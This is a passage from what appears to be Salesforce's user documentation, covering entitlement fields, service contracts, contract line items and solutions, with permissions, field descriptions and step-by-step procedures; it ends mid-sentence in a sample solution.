The name of the contract line item (product) associated with
the entitlement.

Contract Line Item

The last day the entitlement is in effect.End Date

The entitlement's name.

We recommend using a descriptive name , such as Phone
Support. This helps users better understand entitlements

Entitlement Name

when they see them on related lists for accounts, contacts, and
assets.

The name of the service contract associated with the
entitlement.

To quickly find a service contract in the lookup dialog box,
select criteria from the Filter by fields. Administrators can
set lookup filters to restrict filter values and results.

Service Contract

The first day the entitlement is in effect.Start Date

The entitlement process associated with the entitlement.

Entitlement processes are timelines that include all of the steps
(milestones) that your support team must complete to resolve

Entitlement Process

cases. Each process includes the logic necessary to determine
how to enforce the correct service level for your customers.

The number of cases the entitlement can support. This field
decreases in value by one each time a case is created with the
entitlement.

This field is only available if Per Incident is selected.

Remaining Cases

The entitlement's status.

Status is determined by your organization’s current system
date and the entitlement’s Start Date and End Date. The
status is:

Status

• Active if the system date is greater than or equal to the
Start Date and less than or equal to the End Date.

• Expired if the system date is greater than the End Date.

• Inactive if the system date is less than the Start Date.

Represents the entitlement's status by displaying one of the
following icons:

Status Icon

•  Active

•  Expired
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DescriptionField

•  Inactive

The type of entitlement, such as Web or phone support.

Administrators can customize this field's values.

Type

See Also:
Entitlement Management Overview
Verifying Entitlements

SERVICE CONTRACTS

Displaying and Editing Service Contracts
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view service contracts:

“Edit” on service contractsTo change service contracts:

Displaying Service Contracts

To view a service contract's details, click a service contract on the Service Contracts tab, list pages, or the Service Contracts
related list on:
• Accounts

• Contacts

The Service Contracts related list shows all the service contacts associated with that item.

Your administrator determines where you can view service contracts.

Editing Service Contracts

To update a service contract, click Edit, change the fields, and click Save.

Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

Service Contracts Related Lists

The lower portion of a service contract displays its related information, including entitlements, contract line items,
history, activities, notes, and attachments.
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You can click:
• Items to display their details

• Show [number] more to increase the number of items in the list

• Go to list to display a page with the entire list.

Sharing

Click Sharing to share a service contract with other users, groups, or roles. See Sharing Service Contracts on page 1823.

Printing Service Contracts

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Entitlement Management Overview
Service Contract Fields
Creating Service Contracts
Verifying Entitlements
Deleting Service Contracts
Searching for Service Contracts

Viewing Service Contract Lists
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view service contract lists:

“Create” on service contractsTo create service contracts:

From the service contracts list page, you can view detailed service contract information and access other related items. In
Professional, Enterprise, Unlimited, and Developer Edition organizations that have set up the console, you can view service
contract lists via the console's list view.

• Depending on your user permissions on service contracts, you may see these buttons and links:

DescriptionButton or Link

Click to create a new service contract.New Service Contract

Click to edit a service contract.Edit

Click to delete a service contract.Del

1818

Viewing Service Contract ListsService Contracts



• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

Note:  You may be able to grant additional access to service contracts beyond what the sharing model allows. See
Sharing Service Contracts on page 1823.

See Also:
Entitlement Management Overview

Searching for Service Contracts
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view service contracts:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create a custom list view to find service contracts that match specific criteria.

See Also:
Entitlement Management Overview

Creating Service Contracts
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Create” on service contractsTo create or clone service contracts:

Service contracts are agreements between you and your customers for a type of customer support. Service contracts can represent
different kinds of customer support, such as warranties, subscriptions, or service level agreements (SLAs).

To create service contracts:
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1. Click New on the Service Contracts tab or New Service Contract from the Service Contracts related list on accounts or
contacts.

Your administrator determines where you can create service contracts.

2. Enter the following details:

DescriptionField

The name of the account that purchased or owns the service
contract.

Account Name

The initial day the service contract went into effect (whereas
Start Date may include a renewal date).

Activation Date

An approval process status field.Approval Status

City portion of billing address. Up to 40 characters are
allowed in this field.

Billing City

Country portion of billing address. Up to 80 characters are
allowed in this field.

Billing Country

The billing country for the address. Entry is selected from
a picklist of standard values.

Billing Country (beta)

State or province portion of billing address. Up to 80
characters are allowed in this field.

Billing State

The billing state or province for the address. Entry is selected
from a picklist of standard values.

Billing State/Province (beta)

Zip or postal code portion of billing address. Up to 20
characters are allowed in this field.

Billing Zip

Name of the contact associated with the service contract.
Select from the drop-down list.

Contact Name

Name of the service contract.Contract Name

Automatically-generated number identifying the service
contract. (Read only)

Contract Number

User who created the service contract. (Read only)Created By

The date the service contract was created (whereas
Activation Date is the initial day the service contract

Created Date

went into effect and Start Date may include a renewal
date).

The currency for all amount fields in the service contract.
Available only for organizations that use multiple currencies.

You can't change the currency on a service contract that has
contract line items.

Currency

Description of the service contract. Up to 32 KB of data are
allowed in this field.

Description
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DescriptionField

Weighted average of all contract line item discounts on the
service contract. Can be any positive number up to 100.
(Read only)

Discount

The last day the service contract is in effect.End Date

Total price of the service contract plus shipping and taxes.
(Read only)

Grand Total

User who most recently changed the service contract. (Read
only)

Last Modified By

Number of contract line items (products) on the service
contract.

Line Items

Assigned owner of the service contact.Service Contract Owner

Total shipping and handling costs for the service contract.Shipping and Handling

City portion of primary mailing or shipping address. Up to
40 characters are allowed in this field.

Shipping City

Country portion of primary mailing or shipping address. Up
to 80 characters are allowed in this field.

Shipping Country

The shipping country for the address. Entry is selected from
a picklist of standard values.

Shipping Country (beta)

State or province portion of primary mailing or shipping
address. Up to 80 characters are allowed in this field.

Shipping State

The shipping state or province for the address. Entry is
selected from a picklist of standard values.

Shipping State/Province (beta)

Primary mailing or shipping street address of account. Up
to 255 characters are allowed in this field.

Shipping Street

Zip or postal code portion of primary mailing or shipping
address. Up to 20 characters are allowed in this field.

Shipping Zip

Any terms that you have specifically agreed to and want to
track in the service contract.

Special Terms

The first day the service contract is in effect.Start Date

The status of the service contract.

Status is determined by your organization’s current system
date and the service contract’s Start Date and End Date.
The status is:

Status

• Active if the system date is greater than or equal to the
Start Date and less than or equal to the End Date.

• Expired if the system date is greater than the End Date.
• Inactive if the system date is less than the Start Date.
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DescriptionField

Represents the service contract's status by displaying one of
the following icons:

Status Icon

•  Active
•  Expired
•  Inactive

Total of the service contract line items (products) before
discounts, taxes, and shipping are applied. (Read only)

Subtotal

Total taxes for the service contract.Tax

Number of months that the service contract is in effect.Term (months)

Total of the contract line items (products) after discounts
and before taxes and shipping. (Read only)

Total Price

3. Click Save.

Tip:  Click Clone to quickly create a new service contract from the existing one. This helps you create multiple service
contracts for a customer.

See Also:
Entitlement Management Overview
Searching for Service Contracts

Deleting Service Contracts
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Delete” on service contractsTo delete service contracts:

To delete a service contract, click Del next to the service contract on the service contract list page, or click Delete on the
service contract detail page.

Deleting a service contract moves it to the Recycle Bin. Any notes, attachments, activities, or contract line items associated
with the service contract are also deleted. If you undelete the service contract, any associated items are undeleted.

Note:

• The Del link and Delete button only display for users with the “Delete” permission on service contracts.
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• You can't delete service contracts with active or expired entitlements.

See Also:
Entitlement Management Overview
Searching for Service Contracts

Sharing Service Contracts
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view service contracts:

Your administrator sets the default sharing model for your organization. You can extend sharing to more users than the default
set by your administrator. However, you can't make the sharing model more restrictive than the default.

To view and manage sharing details, click Sharing on a service contract's detail page. The Sharing Detail page lists the users,
groups, roles, and territories that have sharing access to the service contract. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

Note:  Users must have the “Read” permission on service contracts for you to share service contracts with them.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

See Also:
Entitlement Management Overview
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Using the Service Contracts Related List on Accounts or
Contacts

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on accountsTo view service contracts on accounts:

“Read” on contactsTo view service contracts on contacts:

“Create” on service contractsTo create service contracts:

“Edit” on service contractsTo change service contracts:

The Service Contracts related list displays a list of service contracts that apply to accounts or contacts. Service contracts are
agreements between you and your customers for a type of customer support. Service contracts can represent different kinds of
customer support, such as warranties, subscriptions, or service level agreements (SLAs).

Administrators determine the Service Contracts related list's availability and content. The following options and information
display by default:

New Service Contract

Click this button to create a new service contract for an account or contact.

Action

The actions you can perform on the service contract:
• Click Edit to update a service contract.

• Click Del to delete a service contact.

Contract Number

Automatically-generated number identifying the service contract.

Start Date

The first day the service contract is in effect.

End Date

The last day the service contract is in effect.

Status

The status of the service contract.

See Also:
Entitlement Management Overview
Deleting Service Contracts
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Service Contracts Home
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view the Service Contracts tab:

“Read” on service contractsTo view service contracts:

“Create” on service contractsTo create service contracts:

Clicking on the Service Contracts tab displays the service contracts home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• If your administrator has set up the console to include service contracts, click the Console tab to find, view, and edit service
contracts and their associated records on one screen. See Displaying the Console Tab on page 1890.

• In the Recent Service Contracts section, select an item from the drop-down list to display a brief list of the top service
contracts matching that criteria. From the list, you can click the name of any service contract to go to it. Toggle the Show
25 items and Show 10 items links to change the number of items that display. The fields you see are determined by the
Service Contracts Tab search layout defined by your administrator and by field-level security settings. The Recent Service
Contract choices are:

DescriptionRecent Service Contract Choice

The last ten or twenty-five service contracts you viewed,
with the most recently viewed service contract listed first.

Recently Viewed

This list is derived from your recent items and includes
records owned by you and other users.

• In the Recent Service Contracts section, click New to create a new service contract.

• In the Reports section, click Go to Reports to create customized reports that include service contracts.

• In the Tools section, click Transfer Service Contracts to transfer multiple service contracts from one user to another.

See Also:
Entitlement Management Overview
Displaying and Editing Service Contracts
Creating Service Contracts
Deleting Service Contracts
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Service Contract History
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contractsTo view service contracts:

The Service Contract History related list tracks the changes on a service contract. Any time a user modifies any of the standard
or custom fields, a new entry is added to the related list. All entries include the date, time, nature of the change, and who
made the change. Modifications to the related list itself aren't tracked.

See Also:
Entitlement Management Overview

Service Contract Fields
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Here’s a service contract’s fields. Some of these fields may not be visible or editable depending on your page layout and field-level
security settings.

DescriptionField

The name of the account that purchased or owns the service
contract.

Account Name

The initial day the service contract went into effect (whereas
Start Date may include a renewal date).

Activation Date

An approval process status field.Approval Status

City portion of billing address. Up to 40 characters are allowed
in this field.

Billing City

Country portion of billing address. Up to 80 characters are
allowed in this field.

Billing Country

The billing country for the address. Entry is selected from a
picklist of standard values.

Billing Country (beta)

State or province portion of billing address. Up to 80 characters
are allowed in this field.

Billing State
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DescriptionField

The billing state or province for the address. Entry is selected
from a picklist of standard values.

Billing State/Province (beta)

Zip or postal code portion of billing address. Up to 20
characters are allowed in this field.

Billing Zip

Name of the contact associated with the service contract. Select
from the drop-down list.

Contact Name

Name of the service contract.Contract Name

Automatically-generated number identifying the service
contract. (Read only)

Contract Number

User who created the service contract. (Read only)Created By

The date the service contract was created (whereas
Activation Date is the initial day the service contract went
into effect and Start Date may include a renewal date).

Created Date

The currency for all amount fields in the service contract.
Available only for organizations that use multiple currencies.

You can't change the currency on a service contract that has
contract line items.

Currency

Description of the service contract. Up to 32 KB of data are
allowed in this field.

Description

Weighted average of all contract line item discounts on the
service contract. Can be any positive number up to 100. (Read
only)

Discount

The last day the service contract is in effect.End Date

Total price of the service contract plus shipping and taxes.
(Read only)

Grand Total

User who most recently changed the service contract. (Read
only)

Last Modified By

Number of contract line items (products) on the service
contract.

Line Items

Assigned owner of the service contact.Service Contract Owner

Total shipping and handling costs for the service contract.Shipping and Handling

City portion of primary mailing or shipping address. Up to
40 characters are allowed in this field.

Shipping City

Country portion of primary mailing or shipping address. Up
to 80 characters are allowed in this field.

Shipping Country

The shipping country for the address. Entry is selected from
a picklist of standard values.

Shipping Country (beta)
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DescriptionField

State or province portion of primary mailing or shipping
address. Up to 80 characters are allowed in this field.

Shipping State

The shipping state or province for the address. Entry is selected
from a picklist of standard values.

Shipping State/Province (beta)

Primary mailing or shipping street address of account. Up to
255 characters are allowed in this field.

Shipping Street

Zip or postal code portion of primary mailing or shipping
address. Up to 20 characters are allowed in this field.

Shipping Zip

Any terms that you have specifically agreed to and want to
track in the service contract.

Special Terms

The first day the service contract is in effect.Start Date

The status of the service contract.

Status is determined by your organization’s current system
date and the service contract’s Start Date and End Date.
The status is:

Status

• Active if the system date is greater than or equal to the
Start Date and less than or equal to the End Date.

• Expired if the system date is greater than the End Date.

• Inactive if the system date is less than the Start Date.

Represents the service contract's status by displaying one of
the following icons:

Status Icon

•  Active

•  Expired

•  Inactive

Total of the service contract line items (products) before
discounts, taxes, and shipping are applied. (Read only)

Subtotal

Total taxes for the service contract.Tax

Number of months that the service contract is in effect.Term (months)

Total of the contract line items (products) after discounts and
before taxes and shipping. (Read only)

Total Price

See Also:
Entitlement Management Overview
Contract Line Item Fields
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CONTRACT LINE ITEMS

Displaying and Editing Contract Line Items
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on contract line itemsTo view contract line items:

“Edit” on contract line itemsTo change contract line items:

Displaying Contract Line Items

To view a contract line item's details, click a service contract on the Service Contracts tab, list pages, or the Service
Contracts related list on:
• Accounts

• Contacts

The Contract Line Items related list shows all the contract line items associated with a service contract.

Your administrator determines if contract line items display on service contracts.

Editing Contract Line Items

To update a contract line item, click Edit, change the fields, and click Save.

Contract Line Items Related Lists

The lower portion of a contract line item displays information related to it, including entitlements, history, activities,
notes, and attachments.

You can click:
• Items to display their details

• Show [number] more to increase the number of items in the list

• Go to list to display a page with the entire list.

Sharing

You can't share contract line items. Sharing for contract line items is inherited from service contract sharing. For example,
users with the “Read” permission on service contracts inherit the “Read” permission on contract line items.
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Printing Contract Line Items

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Entitlement Management Overview
Contract Line Item Fields
Adding Contract Line Items
Searching for Contract Line Items

Searching for Contract Line Items
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on contract line itemsTo view contract line items:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

Note:  You can't create contract line item list views to find contract line items that match specific criteria.

See Also:
Entitlement Management Overview
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Adding Contract Line Items
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Edit” on service contracts

AND

“Create” on contract line items and “Read” on products and
price books

To add contract line items to service contracts:

Contract line items are specific products covered by a service contract.

To add contract line items to a service contract:

1. Click Add Line Item in the Contract Line Items related list.
2. Select a price book if prompted. If only the standard price book is activated, it’s automatically assigned to the service

contract.
3. Select one or more products.
4. Type the attributes for each product. Your administrator may have customized this page to include fields specific to your

business.
5. Type the Sales Price for the product. The Sales Price defaults to the List Price specified in the price book. Depending

on your user permissions, you may be able to override this value.
6. Type the number of products at this price in the Quantity box.
7. Click Save.

See Also:
Entitlement Management Overview
Displaying and Editing Service Contracts
Searching for Contract Line Items
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Deleting Contract Line Items
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Delete” on contract line itemsTo delete contract line items:

To delete a contract line item, click Del next to the contract line item on the service contract list page, or click Delete on the
contract line item detail page.

Deleting a contract line item moves it to the Recycle Bin. Any notes, attachments, or activities associated with the contract
line item are also deleted. If you undelete the contract line item, any associated items are undeleted.

Note:  The Del link and Delete button only display for users with the “Delete” permission on service contracts.

See Also:
Entitlement Management Overview
Searching for Contract Line Items

1832

Deleting Contract Line ItemsContract Line Items



Using the Contract Line Items Related List
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on service contracts

AND

“Read” on contract line items

To view contract line items:

“Edit” on service contracts

AND

“Create” on contract line items and “Read” on products and
price books

To add contract line items:

“Edit” on contract line itemsTo change contract line items:

The Contract Line Items related list displays a list of products covered by a service contract. Service contracts are agreements
between you and your customers for a type of customer support. Service contracts can represent different kinds of customer
support, such as warranties, subscriptions, or service level agreements (SLAs).

Administrators determine the Contract Line Item related list's availability and contents. The following options and information
display by default:

Add Line Item

Click this button to add a contract line item (product) to the service contract.

Action

The actions you can perform on the contract line item:
• Click Edit to change the contract line item.

• Click Del to remove the contract line item.

Line Item Number

Automatically-generated number that identifies the contract line item.

Product Name

The product's name. Click to view the product's details.

Start Date

The first day the service contract is in effect.

End Date

The last day the service contract is in effect.
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Status

The status of the service contract.

Asset Name

Name of the asset associated with the contract line item.

Products represent the items your company sells whereas assets represent the specific products your customers have
purchased.

Quantity

Number of units of the contract line item (product) included in the service contract.

Sales Price

Price to use for the contract line item (product).

See Also:
Entitlement Management Overview

Contract Line Item History
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on contract line itemsTo view contract line items:

“Customize Application”To set up which fields are tracked:

The Contract Line Item History related list tracks the changes on a contract line item. Any time a user modifies any of the
standard or custom fields, a new entry is added to the related list. All entries include the date, time, nature of the change, and
who made the change. Modifications to the related list itself aren't tracked. To set which fields are tracked, from Setup, click
Customize > Service Contracts > Contract Line Items > Fields > Set History Tracking.

See Also:
Entitlement Management Overview

Contract Line Item Fields
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Here's a contract line item's fields. Some of these fields may not be visible or editable depending on your page layout and
field-level security settings.
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DescriptionField

Name of the asset associated with the contract line item.

Products represent the items your company sells whereas assets
represent the specific products your customers have purchased.

Asset Name

User who created the contract line item. (Read only)Created By

The date the contract line item was created.Created Date

Description of the contract line item. Up to 32 KB of data are
allowed in this field. Only the first 255 characters display in
reports.

Description

Discount you apply to the contact line item. You can enter a
number with or without the percent symbol and you can use
up to two decimal places.

Discount

The last day the contract line item is in effect.End Date

User who most recently changed the contract line item. (Read
only)

Last Modified By

Automatically-generated number that identifies the contract
line item. (Read only)

Line Item Number

Price of the contract line item (product) within the price book
including currency. (Read only)

List Price

The name of the contract line item (product) as listed in the
price book.

Product

Number of units of the contract line item (product) included
in the service contract.

Value must be one or greater.

Quantity

Price to use for the contract line item.

Initially, the sale price for a contract line item (product) added
to an opportunity or quote is the contract line item’s list price
from the price book, but you can change it here.

Sales Price

Name of the service contract associated with the contract line
item.

Service Contract

Start date of the contract line item.Start Date

The status of the contract line item.

Status is determined by your organization’s current system
date and the contract line item’s Start Date and End Date.
The status is:

Status

• Active if the system date is greater than or equal to the
Start Date and less than or equal to the End Date.

• Expired if the system date is greater than the End Date.
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DescriptionField

• Inactive if the system date is less than the Start Date.

Represents the contract line item's status by displaying one of
the following icons:

Status Icon

•  Active

•  Expired

•  Inactive

Contract line item's sales price multiplied by the quantity.Subtotal

Contract line item's sales price multiplied by the quantity
minus the discount.

Total Price

See Also:
Entitlement Management Overview

ACCESSING KNOWLEDGE

SOLUTIONS

Solutions Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A solution is a detailed description of a customer issue and the resolution of that issue. Solution managers, administrators,
and users with the appropriate permissions can create, review, and categorize solutions. They can also publish solutions to the
Self-Service portal and make solutions public.

The Solutions tab displays a home page that lets you quickly locate and manage solutions. If your organization uses solution
categories, you can browse for and find solutions by category. You can also sort and filter solutions using standard and custom
list views.

Administrators, and users with the “Import Solutions” permission, can import solutions.
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Note:  By default, solutions are created and displayed in text format. Administrators can enable HTML solutions so
that all solutions are displayed in HTML format and created using an HTML editor.

See Also:
Solutions Home
Tips on Writing Solutions
HTML Solutions Overview
Tip sheet: Tips & Hints for Solutions
Administrator setup guide: Solutions Implementation Guide

Searching for Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on solutionsTo view solutions:

You can find solutions by:

• Searching from the Cases Tab

• Searching from the Solutions Tab

• Browsing for Solutions

• Searching Using Global Search

• Creating Custom List Views

When you search for solutions, all standard text fields on solutions are searched, as well as the following custom field types:

• Auto-number

• Text

• Text area

• Long text area

• Email

• Phone

• Any field set as an external ID

Be aware of these behaviors in solution searches:

• Solution Search returns solutions that include all or any of your keywords. For example, searching for data loader may
return results with just data, just loader, or both keywords in any order. Items that include more of your keywords are listed
higher in results, and items that contain your keywords as a phrase or near each other are also listed higher.

• Solution Search can stem—or find variants of your search terms. For example, searching for creating finds solutions
containing create, created, and creating.
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Note: This behavior applies only to the type of word you search for: a search for a noun matches variants of the
noun form, a search for a verb matches variants of the verb form, and so on.

• You can use search wildcards and operators to improve your Solution Search results.

• If any search terms match words in a solution title, the solution is boosted in the search results.

• The numbers displayed in parentheses and brackets alongside search results indicate the number of matching solutions
found. For example, if you search for Truck and Truck (35) displays, then your organization has 35 solutions with the
term Truck.

Searching from the Cases Tab

1. On a case detail page in the Solutions related list, enter keywords related to a possible solution in the search box. You can
use search wildcards and operators in your query.

2. If your organization uses categories, select a category in which to search.
3. Click Find Solution. The search returns a list of relevant solutions.

• Click column headings to sort the results in ascending or descending order.

◊ Sorting applies across all search results for a particular object, including those on subsequent pages.
◊ You can’t click on column headings for multi-select picklist fields because you can’t sort the multi-select picklist

field type.

• If multilingual solutions is enabled for your organization, search results return solutions in all languages that have
matching keywords. However, search results across all languages might not be reliable because terms searched from
one language to another are processed differently.

• If solution summaries and inline category breadcrumbs are enabled for your organization, search results display up to
150 characters of the solution details and up to 150 characters of the category trail to which the solution belongs.

• Note that if HTML Solutions is enabled, all tags and images are removed from solution details.
• If suggested solutions is enabled, click View Suggested Solutions to view relevant solutions using a formula that

automatically scores the relevancy of each solution to the particular case via word frequency, word proximity, case
similarity, and related solutions.

4. If search results filters are enabled for your organization, you can filter the search results. Click the Show Filters link in
the appropriate results related list, enter the filter criteria, and click Apply Filters.

Searching from the Solutions Tab

1. On the Solutions tab, enter keywords related to a possible solution in the search box at the top of the page. You can use
search wildcards and operators in your query.

2. If your organization uses categories, select a category in which to search.
3. Click Find Solution. The search returns a list of matching records.

Click column headings to sort the results in ascending or descending order.

Note: Sorting applies across all search results for a particular object, including those on subsequent pages. You
can’t click on column headings for multi-select picklist fields because you can’t sort the multi-select picklist field
type.

If multilingual solutions is enabled for your organization, search results return solutions in all languages that have matching
keywords. However, search results across all languages might not be reliable because terms searched from one language to
another are processed differently. If solution summaries and inline category breadcrumbs are enabled for your organization,
search results display up to 150 characters of the solution details and up to 150 characters of the category trail to which
the solution belongs. Note that if HTML Solutions is enabled, all tags and images are removed from solution details.
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4. If search results filters are enabled for your organization, you can filter the search results. Click the Show Filters link in
the appropriate results related list, enter the filter criteria, and click Apply Filters.

5. From the list, select a record to jump directly to that record. If you do not find a matching record, browse for a relevant
solution using categories.

The fields you see in search results are determined by the search layout defined by your administrator and by your field-level
security settings (available in Enterprise, Unlimited, and Developer Editions only).

Browsing for Solutions

1. In the Browse Solutions section of the Solutions tab, click a solution category to view a list of solutions in that category
and its subcategories.

2. Optionally, use the drop-down list to sort the solutions by category, most commonly used, or recently updated.
3. Select a record from the results to jump directly to that record.

Searching Using Global Search

1. Enter your search terms in the header search box.

You can use search wildcards and operators in your query.

2. Select Search Options... from the drop-down and select Solutions to narrow your search results.
3. Click Search.

See Also:
Solving Cases
Multilingual Solutions Overview
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Displaying and Selecting Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on solutionsTo view solutions:

“Read” on solutions and cases

AND

“Edit” on cases

To attach a solution to a case:

“Edit” on solutionsTo change unpublished solutions:

“Delete” on solutionsTo delete unpublished solutions:

“Manage Published Solutions”To change published solutions:

“Manage Published Solutions”To delete published solutions:

Displaying Solutions

When you have located a solution, either by searching from a case or from the solutions home or list pages, click the
solution title to display detailed information. If hover details are enabled, hover over any lookup field on the detail page
to view key information about a record before clicking into that record’s detail page.

Viewing Solution Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the solution.

Selecting Solutions

To attach the solution to your case, click Select from the solution detail page or the search results list. The solution is
automatically added to the case. The Select option is available only if you searched for a solution from within a case, or
you searched for solutions to add to your Self-Service portal Home page.

Editing and Deleting Unpublished Solutions

Users with the “Edit” permission on solutions can update unpublished solutions by clicking Edit, changing the necessary
fields, and then clicking Save. To delete an unpublished solution, a user with the “Delete” permission on solutions can
click the Delete button.

Note:  If HTML Solutions is enabled for your organization, and you open a text solution with the HTML
editor and save it, the solution will become an HTML solution.

Editing and Deleting Published Solutions

The ability to edit and delete published solutions is restricted to users who have the “Managed Published Solutions”
permission, such as solution managers and administrators.
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Note: Translated solutions inherit the record type of the master solution from which they are translated. You
cannot change the record type of translated solutions.

Solution Related Lists

Below the solution details is information related to the solution, including a history of changes to the solution, open and
closed activities, attachments, related cases, translated solutions, and the categories to which the solution belongs. The
related lists you see are determined by your personal customization, and by any customization your administrator has
made to page layouts or your permissions to view related data.

Note:  The size limit for a file attached to a solution is 5 MB. You cannot upload solution attachments with
the following file extensions: htm, html, htt, htx, mhtm, mhtml, shtm, shtml, acgi.

Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter
is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and manage the
related list items. Click a hover link to jump to the content of the related list. If hover links are not enabled,
contact your Salesforce administrator.

Printing Solutions

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

Note:  If HTML solutions is enabled for your organization, any HTML formatting applied in your solution
details will appear in the Printable View.

To return to the last list page you viewed, click Back to list at the top of the solution detail page. If your organization has
enabled collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the
detail page.

See Also:
Solution History
Solution Fields
Creating Solutions
Categorizing Solutions
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Viewing Solution Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on solutionsTo view solution lists:

“Create” on solutionsTo create solutions:

“Edit” on solutionsTo change solutions:

“Delete” on solutionsTo delete solutions:

The Solutions list page displays a list of solutions in your current view. To show a filtered list of items, select a predefined list
from the View drop-down list, or click Create New View to define your own custom views. To edit or delete any view you
created, select it from the View drop-down list and click Edit.

• Click a solution title to view the detail. Click Edit or Del to change the solution or move it to the Recycle Bin.

• If Chatter is enabled, click  or  to follow or stop following a solution in your Chatter feed.
• Click New Solution or select Solution from the Create New drop-down list in the sidebar to create a solution.

See Also:
Solutions Overview

Creating Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on solutionsTo create solutions:

You can create a new solution in the following ways:

• Create a new solution from the sidebar or Solutions tab:

1. Select Solution from the Create New drop-down list in the sidebar, or click New next to Recent Solutions on the
solutions home page.

If multilingual solutions is enabled for your organization, you can create a translated solution by clicking New on the
Translated Solutions related list of the master solution you want to translate. Translated solutions inherit the record
type of the master solution from which they are translated. You cannot change the record type of translated solutions.
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2. If multilingual solutions is enabled for your organization, select the language for the solution from the Language
picklist.

The languages available are the languages supported by Salesforce. The Language picklist excludes languages already
used in the master solution or in other translated solutions associated with the master solution.

3. Enter the solution title, details, and any other information.

Tip:  In solution searches, if any search terms match words in a solution title, the solution is boosted in the
search results. Thus, it's a good idea to write a solution title with relevant words that users are likely to use in
searches.

If HTML Solutions is enabled for your organization, you can enter solution details in an HTML editor. The HTML
editor allows you to use a toolbar to insert images and format the text and paragraphs in your solution.

4. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the solution. Spell Checker only
checks the details of a solution, not the title.

For organizations with multilingual solutions, spelling is checked in the language you selected from the Language
picklist. Spell Checker does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t
support Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

5. Click Save.

Note: Images in HTML solution details will not show up in list views and reports.

• Create a new solution while closing a case:

1. Choose Close Case on a case detail page, or click Save & Close while editing a case.
2. Enter the title and details under Solution Information, and check Submit to knowledge base to submit the

solution for review by your solution managers.
3. Click Save.

See Also:
Solution Fields
Reviewing Solutions
Tips on Writing Solutions
Categorizing Solutions

Tips on Writing Solutions
To assist users in solving their cases, it is important to write good solutions. Review the guidelines below, and also see the Tips
& Hints for Solutions document.

Reusable

• Include all facts and symptoms of the problem.

• Include any necessary analysis or troubleshooting ideas.
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• Include a concise, accurate description of the cause and resolution of the problem.

• Include only one cause and one resolution per solution. If there are a number of steps to the resolution, number each step
and put it on a separate line.

• Make sure the text is clear and in the language of the intended audience—both customer support users and your customers.

• Make sure the title properly describes the problem or question.

• Associate as many relevant solutions to a particular case as possible to increase the usefulness of the suggested solutions
feature. Suggested solutions are found using a formula that automatically scores the relevancy of each solution to a particular
case via the number of times the solution is related to similar cases.

Note:  Use a consistent format to ensure that all solutions are reusable. You can determine the best format for your
organization, but make sure each solution contains a title, the symptoms of the problem, the cause of the problem,
and the resolution to the problem.

Findable

• Make sure the solution can be found by multiple troubleshooting paths and by different people who will describe problems
in different ways.

• Make sure the solution is unique and can exist as a discrete piece of knowledge.

• Make sure the solution is meaningful to your organization and is worth sharing with your customers.

• Make sure the solution includes words that customers use so that when they log their own cases via the Self-Service Portal
or the Customer Portal, the suggested solutions feature can return useful results based on word frequency. For example,
if customers use the word “hub” for “router,” include “hub” in the solution to increase the likelihood of it being returned
in the results of suggested solutions.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Technically Accurate

• Make sure the solution is accurate and up-to-date.

• Make sure the level of technical detail is appropriate for the intended audience.

Sample Solution

This example provides a clear solution to a specific problem.

How do I change an account's billing information?

Problem–Users aren't sure how to change an account's billing information, such as the credit
